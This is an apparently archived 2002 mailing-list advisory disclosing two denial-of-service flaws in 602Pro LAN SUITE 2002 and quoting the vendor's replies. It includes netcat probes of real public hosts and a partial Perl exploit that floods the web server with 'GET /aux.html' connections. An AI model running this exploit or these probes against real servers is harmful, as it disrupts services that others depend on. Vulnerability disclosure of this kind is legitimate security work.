[UPDATED] Advisory: Multiple 602Pro LAN SUITE 2002 Denial of Service Attacks

From: Stan Bubrouski (stanat_private)
Date: Thu Aug 22 2002 - 07:28:22 PDT

  • Next message: Jens Jensen: "possible exploit: D-Link DI-804 unauthorized DHCP release from WAN"

    Date: August 3, 2002 (Updated August 20, 2002)
    Author: Stan Bubrouski
    Product: 602Pro LAN SUITE 2002
    Version: 2002
    Vendor: Software602, Inc.
    Summary: Denial of Service attacks in webserver and telnet proxy
    Description: There are two denial of service attacks
    in 602Pro LAN SUITE 2002 for windows.  The problems
    are described below.  I've once again attached an
    exploit for the webserver DoS out of sheer frustration.
    Problem 1: Webserver/Webmail windows device name DoS attack
    This problem is NOT FIXED.  The person from
    Software602 who responded to my advisory completely
    lacks an understanding of how windows devices work,
    and as a result this problem still affects about
    %50+ of all their users (using netcraft as a source.)
    Response from developer:
    "1. AUX is filtered for a long time.
       AUX.HTML is not a problem because of the extension (no aux.html device
    As you can see the developer does not understand
    that on most windows platform aux.whatever or
    con.whatever is the same as AUX or CON respectively.
    To prove this I used a harmless method of testing
    this problem using sites listed on Netcraft as
    using Web602.  Here is an example of a non-
    vulnerable host:
    $ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].com 80
    HTTP/1.1 404 The file requested was not found
    Server: WEB602/1.04
    Content-Type: text/html
    Content-Length: 111
    Notice the Content-Length is 111, this is the length
    of the built-in 404 error message.  BTW using HEAD
    does not exibit the problem, only using GET requests
    does. Ok now let's look at a vulnerable host:
    $ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].net 80
    HTTP/1.1 200 OK
    Server: WEB602/1.04
    Content-type: text/html
    Content-length: 0
    Connection: close
    Notice the Content-Length is 0, if I were to send a
    GET request to that host requesting aux.html it
    would say Content-Length: 0 but the connection NEVER
    closes, it doesn't even time-out.  Doing this
    repetitively quickly and efficiently eats up memory
    and CPU which will not be released till the process
    is killed.
    This problem only seems to affect certain versions
    of Windows.  Despite what the developers claim it
    is a problem and was able to find a couple hundred
    vulenrable hosts using the HEAD method I showed
    above.  It seems to me from the limited information
    I have from having people personally test this Win2k
    SP2/3 (EN) seem vulnerable and Windows XP apparently
    does not.   As for other Windows OSs I can only
    speculate.  Either its the OS or a patch I do not
    have access to, either way there is something wrong.
    Problem 2: The telnet proxy is vulnerable to a DoS attack
    The telnet proxy allows connections to localhost
    essentially allowing you to connect to the proxy
    through the proxy, without limit.
    Response from developer:
    "2. When You set up the IP filter (this is the only one correct way of using
    any proxy server!!!! no free service for anybody!!), then nobody else can
    not connect out trough Your telnet proxy...
    Telnet proxy will be limited by Your notice. In "socksdll.ini" will be line
    "TelnetMax=xxx" (where "xxx" will be number of max connections)."
    So in a new release this will/is fixed.
    # lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
    # Note: Try using a connections setting of 100000+ for obvious results
    # Date: August 3, 2002
    # Author: Stan Bubrouski (stanat_private)
    use IO::Socket;
    if (!$ARGV[2]) {
    	print "Usage $0 <hostname> <port> <connections>\n\n";
    $host = $ARGV[0];
    $port = $ARGV[1];
    $numc = $ARGV[2];
    foreach(1...$numc) {
    	$sock = IO::Socket::INET->new( PeerAddr => "$host", Proto => "tcp", PeerPort => "$port");
    	print $sock "GET /aux.html HTTP/1.0\r\n";

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